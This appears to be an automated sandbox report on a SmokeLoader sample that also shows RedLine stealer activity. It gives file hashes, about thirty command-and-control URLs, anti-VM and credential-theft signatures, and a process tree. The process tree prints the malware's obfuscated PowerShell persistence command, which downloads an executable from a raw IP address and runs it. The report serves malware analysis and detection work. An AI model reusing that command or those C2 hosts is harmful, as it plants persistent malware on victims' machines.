Analysis
max time kernel: 150s
max time network: 195s
platform: windows7_x64
resource: win7v20210408
submitted: 13-08-2021 07:58

Static task: static1
Behavioral task: behavioral1
  Sample: F4800660EB71CEAE41442CC4BFC4A37A.exe
  Resource: win7v20210408
Behavioral task: behavioral2
  Sample: F4800660EB71CEAE41442CC4BFC4A37A.exe
  Resource: win10v20210410
General
Target: F4800660EB71CEAE41442CC4BFC4A37A.exe
Size: 179KB
MD5: f4800660eb71ceae41442cc4bfc4a37a
SHA1: 98a68484de7ff7189bd61d0c04fbba83f2c20e45
SHA256: ca4bcfe479099c61e62b533e4ec5f667265ba2eb0884cbea492648ba3bdb8eb6
SHA512: 20d345977a881d370e6d712162ee3c75056816829f6877f5c70a5795ea0678fa2b2a4d20a64ad29c3bf7ecd96e5649bb30858bf4f1fc786f3520a14cc4c0e85a
Malware Config
Extracted
Family: smokeloader
Version: 2020
C2:
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Signatures

Detected phishing page

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

SmokeLoader
Modular backdoor trojan in use since 2014.

suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs

Downloads MZ/PE file

Executes dropped EXE 5 IoCs
Processes:
  pid   process
  1456  DE9C.exe
  1400  Runtimebroker.exe
  744   E1F7.exe
  996   E7C2.exe
  848   F441.exe

Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
  description        ioc                                                              process
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   F441.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  F441.exe

Deletes itself 1 IoCs
Processes:
  pid   process
  1180  -

Drops startup file 2 IoCs
Processes:
  description                   ioc                                                                                       process
  File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe  cmd.exe
  File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe  cmd.exe

Loads dropped DLL 2 IoCs
Processes:
  pid   process
  1456  DE9C.exe
  1456  DE9C.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

YARA match: themida (Themida packer)
Processes:
  resource                                                                      yara_rule
  C:\Users\Admin\AppData\Local\Temp\F441.exe                                    themida
  behavioral1/memory/848-90-0x0000000000A40000-0x0000000000A41000-memory.dmp    themida

Checks whether UAC is enabled
Processes:
  description        ioc                                                                             process
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  F441.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
  pid   process
  848   F441.exe

Suspicious use of SetThreadContext 1 IoCs
Processes:
  description                          pid   process                                target process
  PID 1016 set thread context of 2020  1016  F4800660EB71CEAE41442CC4BFC4A37A.exe   F4800660EB71CEAE41442CC4BFC4A37A.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
  description     ioc                                               process
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  F4800660EB71CEAE41442CC4BFC4A37A.exe
  Key opened      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  F4800660EB71CEAE41442CC4BFC4A37A.exe
  Key queried     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  F4800660EB71CEAE41442CC4BFC4A37A.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
  pid   process                                entries
  2020  F4800660EB71CEAE41442CC4BFC4A37A.exe   2
  1180  -                                      62 (remaining entries)

Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
  pid   process
  1180  -

Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
  pid   process
  2020  F4800660EB71CEAE41442CC4BFC4A37A.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
  description                 pid   process
  Token: SeShutdownPrivilege  1180  -
  Token: SeShutdownPrivilege  1180  -
  Token: SeDebugPrivilege     848   F441.exe
  Token: SeDebugPrivilege     2028  powershell.exe

Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
  pid   process   entries
  1180  -         4

Suspicious use of SendNotifyMessage 6 IoCs
Processes:
  pid   process   entries
  1180  -         6

Suspicious use of WriteProcessMemory 38 IoCs
Processes:
  description                        pid   process                                target process                         entries
  PID 1016 wrote to memory of 2020   1016  F4800660EB71CEAE41442CC4BFC4A37A.exe   F4800660EB71CEAE41442CC4BFC4A37A.exe   7
  PID 1180 wrote to memory of 1456   1180  -                                      DE9C.exe                               4
  PID 1456 wrote to memory of 1400   1456  DE9C.exe                               Runtimebroker.exe                      4
  PID 1180 wrote to memory of 744    1180  -                                      E1F7.exe                               4
  PID 1180 wrote to memory of 996    1180  -                                      E7C2.exe                               4
  PID 1180 wrote to memory of 848    1180  -                                      F441.exe                               7
  PID 744 wrote to memory of 960     744   E1F7.exe                               cmd.exe                                4
  PID 1400 wrote to memory of 2028   1400  Runtimebroker.exe                      powershell.exe                         4
Processes

[depth 1] C:\Users\Admin\AppData\Local\Temp\F4800660EB71CEAE41442CC4BFC4A37A.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\F4800660EB71CEAE41442CC4BFC4A37A.exe"
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory

    [depth 2] C:\Users\Admin\AppData\Local\Temp\F4800660EB71CEAE41442CC4BFC4A37A.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\F4800660EB71CEAE41442CC4BFC4A37A.exe"
        - Checks SCSI registry key(s)
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection

[depth 1] C:\Users\Admin\AppData\Local\Temp\DE9C.exe
    command line: C:\Users\Admin\AppData\Local\Temp\DE9C.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory

    [depth 2] C:\ProgramData\Runtimebroker.exe
        command line: "C:\ProgramData\Runtimebroker.exe"
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory

        [depth 3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            command line: powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
            - Suspicious use of AdjustPrivilegeToken

[depth 1] C:\Users\Admin\AppData\Local\Temp\E1F7.exe
    command line: C:\Users\Admin\AppData\Local\Temp\E1F7.exe
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    [depth 2] C:\Windows\SysWOW64\cmd.exe
        command line: cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
        - Drops startup file

[depth 1] C:\Users\Admin\AppData\Local\Temp\E7C2.exe
    command line: C:\Users\Admin\AppData\Local\Temp\E7C2.exe
    - Executes dropped EXE

[depth 1] C:\Users\Admin\AppData\Local\Temp\F441.exe
    command line: C:\Users\Admin\AppData\Local\Temp\F441.exe
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\ProgramData\Runtimebroker.exe
MD5: 4f2f17aaf39970811b9f822b1496dc01
SHA1: bf89cf8fbf826b02d4d3eebe8ef3aee1455dc876
SHA256: 3ea9f73f3772290bdfe770b50dc7c726098b6712d327acc90200b31980c8576b
SHA512: 44c35d1b0188a05c65fb5089ab5c6c5fb4baf65d3e6d065c96db167a5cccf344185a40fda256da69f518275670ca3e0bc1097064edb8cf0ac0c2c604cd1368a9

C:\Users\Admin\AppData\Local\Temp\DE9C.exe
MD5: 4f2f17aaf39970811b9f822b1496dc01
SHA1: bf89cf8fbf826b02d4d3eebe8ef3aee1455dc876
SHA256: 3ea9f73f3772290bdfe770b50dc7c726098b6712d327acc90200b31980c8576b
SHA512: 44c35d1b0188a05c65fb5089ab5c6c5fb4baf65d3e6d065c96db167a5cccf344185a40fda256da69f518275670ca3e0bc1097064edb8cf0ac0c2c604cd1368a9

C:\Users\Admin\AppData\Local\Temp\E1F7.exe
MD5: b19ac380411ed5d8b5a7e7e0c1da61a6
SHA1: 9665c20336a5ce437bbf7b564370bfa43e99954c
SHA256: aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619
SHA512: 73b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208

C:\Users\Admin\AppData\Local\Temp\E7C2.exe
MD5: 5707ddada5b7ea6bef434cd294fa12e1
SHA1: 45bb285a597b30e100ed4b15d96a29d718697e5e
SHA256: 85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA512: 91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

C:\Users\Admin\AppData\Local\Temp\F441.exe
MD5: 717d65dba56f47e540dca074c3977b3d
SHA1: d58aa30f826f41663e693f0ad930fdce584f1672
SHA256: 61fb1160ae372d9ba1c95400d5439450c6a66cdf073fa50ee2d5d10c4952cbb3
SHA512: b06e4358411eb8f6315c574922c021bd57218b3e6a0ed727df6b44e20e7818d40fb0347050ce9145ea7e0fd56a7fa93a2358e524c0df030d6d44067c7c83510d

C:\Users\Admin\AppData\Local\Temp\s.bat
MD5: a8bef84a0032e65adc157d70cf33a4f4
SHA1: fb24b6d663880a5998947e96d6b96ff23c2e49ed
SHA256: 10ff0e85e512d5217de8f729643c361b8982c4386b49affb645d903cf1158c1a
SHA512: c2c91b2dc890c8ac2afd853d760ff1ef2043fef58e99fa855947a7dc5d7312c1f991cf285ea10417745c8a463b68cdbe9faadf169731aad88249ed29fdb9909a

\ProgramData\Runtimebroker.exe
MD5: 4f2f17aaf39970811b9f822b1496dc01
SHA1: bf89cf8fbf826b02d4d3eebe8ef3aee1455dc876
SHA256: 3ea9f73f3772290bdfe770b50dc7c726098b6712d327acc90200b31980c8576b
SHA512: 44c35d1b0188a05c65fb5089ab5c6c5fb4baf65d3e6d065c96db167a5cccf344185a40fda256da69f518275670ca3e0bc1097064edb8cf0ac0c2c604cd1368a9

memory/744-83-0x0000000000400000-0x0000000002D86000-memory.dmp  Filesize: 41.5MB
memory/744-82-0x0000000003050000-0x0000000003293000-memory.dmp  Filesize: 2.3MB
memory/744-88-0x0000000004D40000-0x0000000004F51000-memory.dmp  Filesize: 2.1MB
memory/744-76-0x0000000000000000-mapping.dmp
memory/744-89-0x0000000000400000-0x0000000002D86000-memory.dmp  Filesize: 41.5MB
memory/848-84-0x0000000000000000-mapping.dmp
memory/848-99-0x00000000025E0000-0x00000000025E1000-memory.dmp  Filesize: 4KB
memory/848-90-0x0000000000A40000-0x0000000000A41000-memory.dmp  Filesize: 4KB
memory/960-95-0x0000000000000000-mapping.dmp
memory/996-98-0x0000000004A60000-0x0000000004A61000-memory.dmp  Filesize: 4KB
memory/996-79-0x0000000000000000-mapping.dmp
memory/996-92-0x0000000000F60000-0x0000000000F61000-memory.dmp  Filesize: 4KB
memory/1016-63-0x00000000001B0000-0x00000000001BA000-memory.dmp  Filesize: 40KB
memory/1180-64-0x00000000029D0000-0x00000000029E6000-memory.dmp  Filesize: 88KB
memory/1400-78-0x0000000000400000-0x0000000002C7C000-memory.dmp  Filesize: 40.5MB
memory/1400-73-0x0000000000000000-mapping.dmp
memory/1456-70-0x0000000000400000-0x0000000002C7C000-memory.dmp  Filesize: 40.5MB
memory/1456-65-0x0000000000000000-mapping.dmp
memory/1456-69-0x0000000000270000-0x00000000002AB000-memory.dmp  Filesize: 236KB
memory/2020-62-0x0000000075211000-0x0000000075213000-memory.dmp  Filesize: 8KB
memory/2020-60-0x0000000000400000-0x0000000000409000-memory.dmp  Filesize: 36KB
memory/2020-61-0x0000000000402E1A-mapping.dmp
memory/2028-101-0x0000000000000000-mapping.dmp
memory/2028-103-0x0000000002410000-0x000000000305A000-memory.dmp  Filesize: 12.3MB
memory/2028-104-0x00000000008F0000-0x00000000008F1000-memory.dmp  Filesize: 4KB
memory/2028-105-0x00000000046D0000-0x00000000046D1000-memory.dmp  Filesize: 4KB
memory/2028-106-0x0000000002410000-0x000000000305A000-memory.dmp  Filesize: 12.3MB
memory/2028-107-0x0000000002490000-0x0000000002491000-memory.dmp  Filesize: 4KB
memory/2028-108-0x0000000005340000-0x0000000005341000-memory.dmp  Filesize: 4KB
memory/2028-111-0x0000000005750000-0x0000000005751000-memory.dmp  Filesize: 4KB
memory/2028-113-0x000000007EF30000-0x000000007EF31000-memory.dmp  Filesize: 4KB
memory/2028-117-0x00000000057B0000-0x00000000057B1000-memory.dmp  Filesize: 4KB